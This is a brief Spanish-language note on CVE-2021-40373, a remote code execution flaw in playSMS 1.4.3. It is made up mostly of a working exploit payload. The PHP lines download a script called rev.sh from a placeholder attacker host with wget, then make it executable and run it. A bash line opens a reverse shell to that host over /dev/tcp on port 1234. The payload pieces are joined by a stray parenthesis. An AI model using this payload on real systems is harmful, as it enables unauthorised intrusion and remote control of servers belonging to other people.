
CVE-2021-40373 - ejecución remota de código
Existe una vulnerabilidad en playsms 1.4.3 que permite a posibles atacantes ejecutar código de forma remota.
<?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?><?php system("chmod +x rev.sh && ./rev.sh") ?>)#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"